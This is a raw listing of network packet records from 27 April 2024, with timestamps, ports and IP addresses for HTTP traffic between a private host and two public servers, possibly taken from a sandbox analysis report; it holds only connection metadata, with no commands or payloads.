Apr 27, 2024 02:19:03.204235077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.204258919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.204263926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.204282045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.204310894 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.204312086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.204333067 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.204384089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.204401970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.204431057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.204456091 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.204511881 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.204559088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.204574108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.204591990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.204624891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.204631090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.204641104 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.204678059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.277791023 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:03.277991056 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:03.279793978 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:03.400686979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.400726080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.400748968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.400770903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.400791883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.400813103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.400825977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.400840044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.400866032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.400866032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.400918007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.400939941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.400945902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.400975943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.400986910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.401000023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.401015043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.401015043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.401022911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.401036978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.401055098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.401057959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.401077032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.401082039 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.401119947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.451590061 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:03.561563969 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:03.561602116 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:03.561660051 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:03.561660051 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:03.564460039 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:03.596893072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.596925974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.597029924 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.597245932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.597296000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.597342968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.597383022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.597476006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.597522020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.597563028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.597654104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.597712994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.597760916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.597876072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.597922087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.597954988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.598054886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.598092079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.598157883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.598252058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.598311901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.598344088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.652669907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.735366106 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:03.792083025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.792139053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.792160988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.792184114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.792210102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.792280912 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.792295933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.792372942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.792397022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.792464018 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.792589903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.792633057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.792694092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.792764902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.792808056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.792856932 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.792882919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.792922974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.792954922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.793142080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.793167114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.793212891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.849240065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.849404097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.849637985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.852745056 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:03.852807045 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:03.852873087 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:03.853064060 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:03.853128910 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:03.853147030 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:03.853207111 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:03.853303909 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:03.853353024 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:03.988761902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.988794088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.988909006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.988956928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.989002943 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.989017963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.989068985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.989075899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.989109039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.989124060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.989180088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.989264011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.989285946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.989311934 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.989346027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.989357948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.989398003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.989573956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.989661932 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.989696026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.989744902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.989780903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.043421030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.044269085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.044440985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.044507980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.044578075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.184385061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.184416056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.184433937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.184451103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.184468031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.184472084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.184531927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.184534073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.184559107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.184576988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.184581041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.184659004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.184678078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.184710026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.184727907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.184757948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.184782982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.184808016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.184892893 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.239483118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.239510059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.239568949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.240315914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.240334034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.240350962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.240386963 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.308908939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.380222082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.380249023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.380268097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.380289078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.380311012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.380357027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.380381107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.380423069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.380489111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.380534887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.380577087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.380614042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.380623102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.380726099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.380826950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.380872011 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.380887032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.380904913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.380934954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.380939007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.380984068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.435795069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.436065912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.436145067 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.436333895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.436353922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.436408043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.503181934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.558969021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.575088024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.575311899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.575329065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.575371027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.575397968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.575443029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.575460911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.575593948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.575653076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.575704098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.575886011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.575934887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.576025963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.576113939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.576132059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.576179028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.576199055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.576227903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.576235056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.576255083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.576323986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.576384068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.630925894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.631022930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.631073952 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.631571054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.631649971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.631706953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.753730059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.769445896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.769494057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.769541025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.769584894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.769628048 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.769737959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.769829988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.769846916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.769876003 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.769912958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.769954920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.769990921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.770091057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.770137072 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.770162106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.770196915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.770239115 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.770553112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.770632029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.770662069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.770689011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.770723104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.770766973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.782919884 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.826390982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.826410055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.826452971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.826915979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.826934099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.826975107 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.964718103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.964742899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.964803934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.964843035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.964859009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.964909077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.964946032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.965042114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.965086937 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.965126991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.965204954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.965223074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.965250969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.965454102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.965497017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.965533972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.965569019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.965610981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.965662956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.965728045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.965770006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:04.965806961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.965868950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:04.965909004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.022392035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.022510052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.022572041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.022820950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.022890091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.022945881 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.159862995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.159889936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.159908056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.159926891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.159944057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.159949064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.159961939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.159980059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.159981966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.160001993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.160013914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.160046101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.160567045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.160617113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.160659075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.160964012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.160980940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.161017895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.161020994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.161036968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.161078930 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.161129951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.161147118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.161195040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.217454910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.217539072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.217597008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.217655897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.217890024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.217940092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.356018066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.356039047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.356105089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.356141090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.356163025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.356204033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.356240988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.356316090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.356355906 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.356409073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.356545925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.356601954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.356637955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.356734991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.356782913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.356816053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.356894016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.356946945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.356961012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.357017040 CEST	80	49734	176.97.76.106	192.168.2.4
